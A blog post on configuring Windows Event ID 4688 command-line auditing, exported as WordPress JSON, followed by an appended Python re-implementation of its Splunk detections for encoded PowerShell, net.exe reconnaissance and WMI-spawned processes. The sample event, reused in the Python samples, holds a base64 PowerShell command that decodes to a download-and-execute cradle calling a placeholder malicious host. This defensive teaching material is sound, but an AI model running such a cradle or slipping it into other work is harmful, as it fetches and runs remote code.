{"id":190,"date":"2023-09-07T09:00:00","date_gmt":"2023-09-07T09:00:00","guid":{"rendered":"http:\/\/justruss.tech\/index.php\/2023\/09\/07\/event-id-4688-and-why-process-auditing-matters-more-than-you-think\/"},"modified":"2026-05-13T12:59:35","modified_gmt":"2026-05-13T12:59:35","slug":"event-id-4688-and-why-process-auditing-matters-more-than-you-think","status":"publish","type":"post","link":"https:\/\/justruss.tech\/index.php\/2023\/09\/07\/event-id-4688-and-why-process-auditing-matters-more-than-you-think\/","title":{"rendered":"Event ID 4688 and Why Process Auditing Matters More Than You Think"},"content":{"rendered":"<p>Event ID 4688 (A new process has been created) is one of the highest-value events in Windows security logging, but only when it is properly configured. Without command line logging enabled, it records the image path of the new process, the creating process and the account that started it, and nothing about the arguments. With it enabled, it records the full command line including all arguments. For investigation purposes the difference between these two states is enormous: the path tells you that powershell.exe ran, the command line tells you what it ran.<\/p>\n<h3>Configuration: two steps, both required<\/h3>\n<p>Step 1: Enable Audit Process Creation via Group Policy or local policy. Success is enough; failed process creations are rare and rarely interesting:<\/p>\n<pre>Computer Configuration\n  Windows Settings\n    Security Settings\n      Advanced Audit Policy Configuration\n        Detailed Tracking\n          Audit Process Creation: Success<\/pre>\n<p>Step 2: Enable command line logging. The Group Policy setting is Computer Configuration > Administrative Templates > System > Audit Process Creation > Include command line in process creation events; the registry value it sets is:<\/p>\n<pre>reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\" \/v ProcessCreationIncludeCmdLine_Enabled \/t REG_DWORD \/d 1 \/f<\/pre>\n<p>Two caveats. Windows 10 and Server 2016 and later support the command line field natively; Windows 8.1 and Server 2012 R2 need update KB3004375 first. And once it is on, anything passed on a command line, passwords included, ends up in the Security log and in your SIEM, so the log has to be handled with the same sensitivity as the secrets it may now contain.<\/p>\n<p>Verify both are active:<\/p>\n<pre>auditpol \/get \/subcategory:\"Process Creation\"\n# Process Creation                Success\n\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\Audit\" \/v ProcessCreationIncludeCmdLine_Enabled\n# ProcessCreationIncludeCmdLine_Enabled  REG_DWORD  0x1<\/pre>\n<p>If auditpol still reports No Auditing after the policy has applied, check that advanced audit policy is actually in force: the security option Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit policy category settings must be enabled, otherwise the legacy category settings win.<\/p>\n<h3>What a 4688 event looks like with command line logging 
enabled<\/h3>\n<pre>Log Name:    Security\nEvent ID:    4688\nTask:        Process Creation\n\nNew Process Information:\n  New Process ID:       0x1a4c\n  New Process Name:     C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n  Token Elevation Type: TokenElevationTypeFull (2)\n  Mandatory Label:      High Mandatory Level\n  Creator Process Name: C:\\Windows\\System32\\cmd.exe\n  Creator Process ID:   0x0f20\n\nProcess Command Line:\n  powershell.exe -NonInteractive -NoProfile -EncodedCommand\n  SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAbABpAGMAaQBvAHUAcwAuAGUAeABhAG0AcABsAGUALwBwAGEAeQBsAG8AYQBkACcAKQA=<\/pre>\n<p>The Subject fields (account, domain, logon ID) are left out above. Creator Process Name is only present on Windows 10 and Server 2016 or later; older systems give you the Creator Process ID alone, which you resolve against the earlier 4688 that created that PID. TokenElevationTypeFull (2) together with a High mandatory label means this PowerShell is running elevated.<\/p>\n<p>Decoding the base64. The argument is the script encoded as UTF-16LE and then base64, which is why base64 -d alone shows a null after every character and the iconv step is needed:<\/p>\n<pre>echo \"SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAbABpAGMAaQBvAHUAcwAuAGUAeABhAG0AcABsAGUALwBwAGEAeQBsAG8AYQBkACcAKQA=\" \\\n  | base64 -d | iconv -f utf-16le -t utf-8\n# IEX (New-Object Net.WebClient).DownloadString('https:\/\/malicious.example\/payload')<\/pre>\n<h3>Detection patterns in Splunk<\/h3>\n<p>Suspicious encoded PowerShell. powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc and so on) plus the alias -ec, case-insensitively, so matching the literal strings -EncodedCommand and -enc misses valid spellings; a regex over the switch catches all of them and extracts the blob. Decoding it in-search needs an add-on, since base64decode is not a core SPL function, and the add-on must also handle the UTF-16LE step; otherwise decode the extracted b64 field with the shell pipeline above.<\/p>\n<pre>index=wineventlog EventCode=4688 Process_Command_Line=\"* -e*\"\n| rex field=Process_Command_Line \"(?i)\\s-e(?:c|n(?:c(?:o(?:d(?:e(?:d(?:c(?:o(?:m(?:m(?:a(?:n(?:d)?)?)?)?)?)?)?)?)?)?)?)?)?\\s+(?&lt;b64&gt;[A-Za-z0-9+\/=]{16,})\"\n| where isnotnull(b64)\n| table _time, host, New_Process_Name, Process_Command_Line, b64<\/pre>\n<p>Net commands used for domain reconnaissance. The two process name tests are parenthesized so the grouping does not depend on operator precedence. On Windows 10 and later a 4688 carries two Account Name values (Subject and Target Subject), which the Splunk Windows add-on extracts as a multivalue Account_Name; mvindex picks the Subject, the account that started the process. net.exe hands most commands to net1.exe, so you will normally see both.<\/p>\n<pre>index=wineventlog EventCode=4688\n  (New_Process_Name=\"*\\net.exe\" OR New_Process_Name=\"*\\net1.exe\")\n  (Process_Command_Line=\"* user *\" OR Process_Command_Line=\"* group *\"\n   OR Process_Command_Line=\"* localgroup *\")\n| eval user=mvindex(Account_Name, 0)\n| stats count by host, user, Process_Command_Line\n| sort -count<\/pre>\n<p>WMI spawning child processes (lateral movement 
indicator):<\/p>\n<pre>index=wineventlog EventCode=4688\n  Creator_Process_Name=\"*\\WmiPrvSE.exe\"\n  NOT New_Process_Name IN (\"*\\WmiPrvSE.exe\", \"*\\conhost.exe\")\n| table _time, host, Creator_Process_Name, New_Process_Name, Process_Command_Line<\/pre>\n<p>Field value matching in Splunk search is case-insensitive, so a single WmiPrvSE.exe pattern covers every spelling. The query depends on Creator Process Name, which only Windows 10 and Server 2016 or later put in the event. Expect legitimate hits from management and monitoring products that run commands through WMI; baseline by creator, child and account before turning this into an alert.<\/p>\n<h3>Storage volume estimate<\/h3>\n<p>On an average enterprise workstation generating approximately 200 process creation events per hour, or about 4,800 per day, Event ID 4688 with command line logging adds roughly 15-25MB of raw event log data per day per endpoint, which works out to 3-5KB per rendered event. At 1,000 endpoints this is 15-25GB\/day. In a SIEM with compression and indexing, budget approximately 5-8GB\/day at that scale. The cost is worth it: process creation logs are the single most consistently useful data source in incident investigations.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>If you are not logging process creation with command line arguments enabled, you are missing a significant chunk of attacker activity.<\/p>\n","protected":false},"author":0,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-190","post","type-post","status-publish","format-standard","hentry","category-dfir"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/190","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=190"}],"version-history":[{"count":2,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/190\/revisions"}],"predecessor-version":[{"id":232,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/190\/revisions\/232"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/i
ndex.php\/wp-json\/wp\/v2\/media?parent=190"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=190"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=190"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
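The three Splunk detections in the post above (encoded PowerShell, net.exe reconnaissance, WmiPrvSE.exe children) and the decode step, re-implemented as an added example in Python so the logic can be run and checked offline. This is not code from the original post. Field names mirror the Splunk Windows add-on extractions the post uses; the hosts, accounts and command lines are constructed, apart from the encoded blob, which is the one from the post's sample event. The switch matcher accepts every abbreviation of -EncodedCommand that powershell.exe accepts, and the decoder treats the argument as UTF-16LE, then base64, which is what the iconv step in the post is for.

```python
"""Added example, not code from the original post: the post's three 4688
detections as plain Python over constructed sample records. Field names
mirror the Splunk Windows add-on extractions; hosts, accounts and command
lines are invented, except ENCODED_BLOB, taken from the post's sample event."""
import base64
import re
from typing import Optional

# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...)
# and the alias -ec, case-insensitively, so the switch is matched as a
# nested-optional prefix rather than as a literal. Group 1 is the base64 blob.
ENCODED_SWITCH = re.compile(
    r"(?:^|\s)-e(?:c|n(?:c(?:o(?:d(?:e(?:d(?:c(?:o(?:m(?:m(?:a(?:n(?:d)?)?)?)?)?)?)?)?)?)?)?)?)?"
    r"\s+([A-Za-z0-9+/]{16,}={0,2})",
    re.IGNORECASE,
)
# "net user", "net group", "net localgroup" with anything around them.
RECON_VERBS = re.compile(r"(?:^|\s)(?:user|group|localgroup)(?:\s|$)", re.IGNORECASE)
WMI_BENIGN_CHILDREN = ("wmiprvse.exe", "conhost.exe")

# The blob from the post's sample event (script encoded UTF-16LE, then base64).
ENCODED_BLOB = (
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"
    "LgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBtAGEAbABpAGMA"
    "aQBvAHUAcwAuAGUAeABhAG0AcABsAGUALwBwAGEAeQBsAG8AYQBkACcAKQA="
)


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind an encoded-command switch, or None if absent."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)  # restore padding lost in transport
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not base64/UTF-16LE after all; leave it for the analyst


def image_name(path: str) -> str:
    """Lower-cased file name of a New_Process_Name / Creator_Process_Name path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Apply the three patterns to one 4688 record; return (tag, detail) hits."""
    hits = []
    new = image_name(event["New_Process_Name"])
    creator = image_name(event["Creator_Process_Name"])
    cmdline = event["Process_Command_Line"]

    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append(("encoded_powershell", decoded))
    if new in ("net.exe", "net1.exe") and RECON_VERBS.search(cmdline):
        hits.append(("net_recon", cmdline))
    if creator == "wmiprvse.exe" and new not in WMI_BENIGN_CHILDREN:
        hits.append(("wmi_child", f"{creator} -> {new}"))
    return hits


def scan(events: list) -> list:
    """Run classify over a batch; return (host, tag, detail) rows."""
    return [(e["host"], tag, detail) for e in events for tag, detail in classify(e)]


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "Account_Name": "alice",
     "Creator_Process_Name": r"C:\Windows\System32\cmd.exe",
     "New_Process_Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Process_Command_Line": "powershell.exe -NonInteractive -NoProfile -EncodedCommand " + ENCODED_BLOB},
    {"host": "WS01", "Account_Name": "alice",
     "Creator_Process_Name": r"C:\Windows\System32\net.exe",
     "New_Process_Name": r"C:\Windows\System32\net1.exe",
     "Process_Command_Line": r'C:\Windows\system32\net1 group "Domain Admins" /domain'},
    {"host": "SRV02", "Account_Name": "svc_deploy",
     "Creator_Process_Name": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "New_Process_Name": r"C:\Windows\System32\cmd.exe",
     "Process_Command_Line": "cmd.exe /c whoami"},
    {"host": "WS03", "Account_Name": "bob",  # benign: -ExecutionPolicy is not -EncodedCommand
     "Creator_Process_Name": r"C:\Windows\explorer.exe",
     "New_Process_Name": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Process_Command_Line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for host, tag, detail in scan(SAMPLE_EVENTS):
        print(f"{host}\t{tag}\t{detail}")
```

Running the module prints one row per hit; the fourth sample record, a plain -ExecutionPolicy Bypass invocation, produces none because the matcher requires whitespace right after the switch prefix. The same prefix regex can be dropped into a SIEM rex, which keeps the hunting query and the offline check in step.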